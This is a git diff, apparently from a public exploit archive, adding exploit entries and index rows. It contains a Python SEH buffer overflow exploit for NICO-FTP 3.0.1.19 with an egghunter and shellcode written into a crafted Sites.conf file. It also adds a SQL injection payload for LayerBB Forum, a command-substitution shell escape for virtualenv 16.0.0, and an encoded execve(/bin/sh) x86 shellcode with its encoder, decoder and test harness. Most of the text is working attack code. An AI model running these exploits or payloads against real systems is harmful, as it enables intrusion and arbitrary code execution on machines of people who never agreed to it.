diff --git a/exploits/linux/local/45528.txt b/exploits/linux/local/45528.txt new file mode 100644 index 000000000..5eda223ae --- /dev/null +++ b/exploits/linux/local/45528.txt @@ -0,0 +1,19 @@ +# Exploit Title: virtualenv 16.0.0 - Sandbox Escape +# Date: 2018-10-02 +# Exploit Author: vr_system +# Vendor Homepage: https://virtualenv.pypa.io/en/stable/ +# Software Link: https://virtualenv.pypa.io/en/stable/ +# Version: 16.0.0 +# Tested on: kali linux +# CVE : CVE-2018-17793 + +# 1 Install +# root@kali:~#pip install virtualenv +# root@kali:~#virtualenv test_env +# root@kali:~#cd test_env/ +# root@kali:~/test_env#source ./bin/activate + +# 2 Sandbox escape + +(test_env) root@kali:~/test_env#python $(bash >&2) +(test_env) root@kali:~/test_env#python $(rbash >&2) \ No newline at end of file diff --git a/exploits/php/webapps/45392.txt b/exploits/php/webapps/45392.txt index 77a30ada1..d4b03e8f6 100644 --- a/exploits/php/webapps/45392.txt +++ b/exploits/php/webapps/45392.txt @@ -32,12 +32,4 @@ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Payload sample : -userId=1 'AND 1=1 AND '2'='2 - - -Mohamed Sayed -Sr.Information Security analyst - -*Please make sure to encrypt any sensitive information or attachments , you -can download my Public PGP key from* here - \ No newline at end of file +userId=1 'AND 1=1 AND '2'='2 \ No newline at end of file diff --git a/exploits/php/webapps/45530.txt b/exploits/php/webapps/45530.txt new file mode 100644 index 000000000..ae2d6e792 --- /dev/null +++ b/exploits/php/webapps/45530.txt @@ -0,0 +1,17 @@ +# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection +# Exploit Author: Ihsan Sencan +# Dork: N/A +# Date: 2018-10-04 +# Vendor Homepage: https://layerbb.com/ +# Software Link: https://demo.layerbb.com/ +# Version: 1.1.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# POST /search.php HTTP/1.1 +# Host: Target + +search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search \ No newline at end of file diff --git a/exploits/windows_x86/local/45531.py b/exploits/windows_x86/local/45531.py new file mode 100755 index 000000000..0267e1bb1 --- /dev/null +++ b/exploits/windows_x86/local/45531.py @@ -0,0 +1,52 @@ +# Title: NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR) +# Date: 2018-10-04 +# Platforms: Windows +# Author: Miguel Mendez Z +# Vendor: Nico-FTP +# Version: 3.0.1.19 +# Tested on: Windows XP_sp3 [es]/ Windows 7_x86 [eng] + +#!/usr/bin/python + +import struct + +# Bad Byte: \x0a\x0b\x0c\x0d\x0e\x0f\x5d +happy = ( + "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c" + "\x05\x5a\x74\xef\xb8\x30\x52\x31\x53\x8b\xfa\xaf\x75" + "\xea\xaf\x75\xe7\xff\xe7") +happy += "\x90"*50 + +shell = "\x30\x52\x31\x53"*2 # S1R0 +shell += "\x90"*8 +shell += ( + "\x6a\x30\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13" + "\x25\xa8\xbe\x1c\x83\xeb\xfc\xe2\xf4\xd9\x40\x3c\x1c" + "\x25\xa8\xde\x95\xc0\x99\x7e\x78\xae\xf8\x8e\x97\x77" + "\xa4\x35\x4e\x31\x23\xcc\x34\x2a\x1f\xf4\x3a\x14\x57" + "\x12\x20\x44\xd4\xbc\x30\x05\x69\x71\x11\x24\x6f\x5c" + "\xee\x77\xff\x35\x4e\x35\x23\xf4\x20\xae\xe4\xaf\x64" + "\xc6\xe0\xbf\xcd\x74\x23\xe7\x3c\x24\x7b\x35\x55\x3d" + "\x4b\x84\x55\xae\x9c\x35\x1d\xf3\x99\x41\xb0\xe4\x67" + "\xb3\x1d\xe2\x90\x5e\x69\xd3\xab\xc3\xe4\x1e\xd5\x9a" + "\x69\xc1\xf0\x35\x44\x01\xa9\x6d\x7a\xae\xa4\xf5\x97" + "\x7d\xb4\xbf\xcf\xae\xac\x35\x1d\xf5\x21\xfa\x38\x01" + "\xf3\xe5\x7d\x7c\xf2\xef\xe3\xc5\xf7\xe1\x46\xae\xba" + "\x55\x91\x78\xc2\xbf\x91\xa0\x1a\xbe\x1c\x25\xf8\xd6" + "\x2d\xae\xc7\x39\xe3\xf0\x13\x4e\xa9\x87\xfe\xd6\xba" + "\xb0\x15\x23\xe3\xf0\x94\xb8\x60\x2f\x28\x45\xfc\x50" + "\xad\x05\x5b\x36\xda\xd1\x76\x25\xfb\x41\xc9\x46\xc9" + "\xd2\x7f\x25\xa8\xbe\x1c") +shell += "\x90"*30 + +lol = "ftp.pwnd.com"+" "*50 +padding = lol+"\x41"*(4132-(len(shell)+len(happy)+len(lol))) +next_se = "\xEB\x90\x90\x90" +seh_han = struct.pack(" NicoFtp3.exe +nops = " "*(4881-len(padding)) + +payload = padding+shell+happy+next_se+seh_han+nops + +file = open('Sites.conf','w') +file.write('['+payload+']\nHost=\nPort=\nUserName=\nPassword=\nAnonymous=1\nPassive=2\nUseProxy=1\nLocalDir=\nHostDir=\n') +file.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 77424f5e1..aebeafc4b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10010,6 +10010,8 @@ id,file,description,date,author,type,platform,port 45504,exploits/windows_x86/local/45504.py,"Snes9K 0.0.9z - Denial of Service (PoC)",2018-10-01,crash_manucoot,local,windows_x86, 45505,exploits/windows_x86/local/45505.py,"Zahir Enterprise Plus 6 build 10b - Buffer Overflow (SEH)",2018-10-01,SPARC,local,windows_x86, 45516,exploits/linux/local/45516.c,"Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation",2018-09-26,"Qualys Corporation",local,linux, +45528,exploits/linux/local/45528.txt,"virtualenv 16.0.0 - Sandbox Escape",2018-10-04,vr_system,local,linux, +45531,exploits/windows_x86/local/45531.py,"NICO-FTP 3.0.1.19 - Buffer Overflow (SEH)(ASLR)",2018-10-04,"Miguel Mendez Z",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40065,3 +40067,4 @@ id,file,description,date,author,type,platform,port 45524,exploits/php/webapps/45524.txt,"Joomla! Component Jimtawl 2.2.7 - 'id' SQL Injection",2018-10-03,"Ihsan Sencan",webapps,php,80 45525,exploits/hardware/webapps/45525.txt,"Airties AIR5342 1.0.0.18 - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware,80 45526,exploits/hardware/webapps/45526.txt,"RICOH MP C1803 JPN Printer - Cross-Site Scripting",2018-10-03,"Ismail Tasdelen",webapps,hardware, +45530,exploits/php/webapps/45530.txt,"LayerBB Forum 1.1.1 - 'search_query' SQL Injection",2018-10-04,"Ihsan Sencan",webapps,php, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 083fd7f4a..4105713d2 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -908,6 +908,7 @@ id,file,description,date,author,type,platform 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm +45529,shellcodes/linux_x86/45529.c,"Linux/x86 - execve(/bin/sh) + NOT +SHIFT-N+ XOR-N Encoded Shellcode (50 byes)",2018-10-04,"Pedro Cabral",shellcode,linux_x86 45415,shellcodes/linux_x86/45415.c,"Linux/x86 - Add Root User (r00t/blank) + Polymorphic Shellcode (103 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45416,shellcodes/linux_x86/45416.c,"Linux/x86 - Read File (/etc/passwd) + MSF Optimized Shellcode (61 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 45417,shellcodes/linux_x86/45417.c,"Linux/86 - File Modification (/etc/hosts 127.1.1.1 google.com) + Polymorphic Shellcode (99 bytes)",2018-09-14,"Ray Doyle",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/45529.c b/shellcodes/linux_x86/45529.c new file mode 100644 index 000000000..2f2c9d638 --- /dev/null +++ b/shellcodes/linux_x86/45529.c @@ -0,0 +1,158 @@ +/* +# Title: Linux\x86 (NOT +SHIFT-N+ XOR-N) + encoded (/bin/sh) Shellcode (50 byes) +# Author: Pedro Cabral +# Purpose: spawn /bin/sh shell +# Tested On: Ubuntu 16.04.01 LTS +# Arch: x86 +# Size: 50 bytes + +##################################### sh.asm ###################################### + +global _start + +section .text +_start: + + xor eax, eax ; reseting the register + push eax ; pushing null terminator + push 0x68732f2f ; push /bin//sh + push 0x6e69622f + mov ebx, esp ; ebx = /bin//sh + push eax + mov edx, esp ; envp = 0 + push ebx + mov ecx, esp ; argv = [filename,0] + mov al, 11 ; syscall 12 (execve) + int 0x80 ; syscall + +############################# original shellcode #################################### + +pedro@ubuntu:~$ nasm -f elf32 sh.asm +pedro@ubuntu:~$ ld -N -o sh sh.o +pedro@ubuntu:~$ echo;objdump -d ./sh|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + +################################# encode.py ##################################### + +#!/usr/bin/python + +import sys + +if len(sys.argv) != 3: + print "Usage : python encode.py " + sys.exit(0) + +shift = int(sys.argv[1]) +xor = int(sys.argv[2]) + +#shellcode = ( +#"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\" +#"xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +shellcode = ("\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") + +# addition to the inicial of the shellcode the SHIFT and XOR values +encoded_shellcode ="" +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %shift +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor + +# [NOT + SHL-N + XOR-N] encoded shellcode +for i in bytearray(shellcode): + new = ~i & 0xff + new = new << shift + new = new ^ xor + encoded_shellcode += '0x' + encoded_shellcode += '%02x, ' %new + +# end of shellcode +encoded_shellcode += '0x' +encoded_shellcode += '%02x, ' %xor + +# print encoded shellcode +print encoded_shellcode + +#################################### Encoded Shellcode ########################################## + +pedro@ubuntu:~$ python encode.py 4 1337 +0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539, + +#################################### decoder.asm ############################################### + +global _start + +section .text + +_start: + +jmp short enc + +decoder: +xor ecx,ecx +mul ecx + +pop esi +mov cx,[esi] +inc esi +inc esi +mov bx, [esi] +inc esi +inc esi + +push esi +mov edi, esi +main: + +mov ax,[esi] +xor ax, bx +jz call_decoded +shr ax, cl +not word ax +mov [edi], al +inc esi +inc esi +inc edi +jmp short main + +call_decoded: +call [esp] + +enc: +call decoder +encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539 + +######################################### final shellcode ########################################### + +pedro@ubuntu:~/encoded$ nasm -f elf32 decoder.asm +pedro@ubuntu:~/encoded$ ld -o decoder decoder.o +pedro@ubuntu:~/encoded$ echo;objdump -d ./decoder|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo + +"\xeb\x2a\x31\xc9\xf7\xe1\x5e\x66\x8b\x0e\x46\x46\x66\x8b\x1e\x46\x46\x56\x89\xf7\x66\x8b\x06\x66\x31\xd8\x74\x0d\x66\xd3\xe8\x66\xf7\xd0\x88\x07\x46\x46\x47\xeb\xeb\xff\x14\x24\xe8\xd1\xff\xff\xff\x04\x00\x39\x05\xd9\x09\xc9\x06\xc9\x0f\x49\x0c\x29\x0c\x39\x08\xf9\x0d\x49\x0c\x49\x0c\x39\x08\x39\x08\xe9\x0c\x59\x0c\x59\x02\xf9\x04\xc9\x0f\x59\x02\xe9\x04\xf9\x0f\x59\x02\xd9\x04\xc9\x01\x79\x0a\x19\x06\xc9\x02\x39\x05" + + +pedro@ubuntu:~/encoded$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode +pedro@ubuntu:~/encoded$ ./shellcode +Shellcode Length: 50 +$ whoami +pedro +*/ + +#include +#include + +unsigned char code[] = \ +"\xeb\x2a\x31\xc9\xf7\xe1\x5e\x66\x8b\x0e\x46\x46\x66\x8b\x1e\x46\x46\x56\x89\xf7\x66\x8b\x06\x66\x31\xd8\x74\x0d\x66\xd3\xe8\x66\xf7\xd0\x88\x07\x46\x46\x47\xeb\xeb\xff\x14\x24\xe8\xd1\xff\xff\xff\x04\x00\x39\x05\xd9\x09\xc9\x06\xc9\x0f\x49\x0c\x29\x0c\x39\x08\xf9\x0d\x49\x0c\x49\x0c\x39\x08\x39\x08\xe9\x0c\x59\x0c\x59\x02\xf9\x04\xc9\x0f\x59\x02\xe9\x04\xf9\x0f\x59\x02\xd9\x04\xc9\x01\x79\x0a\x19\x06\xc9\x02\x39\x05"; + + +void main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file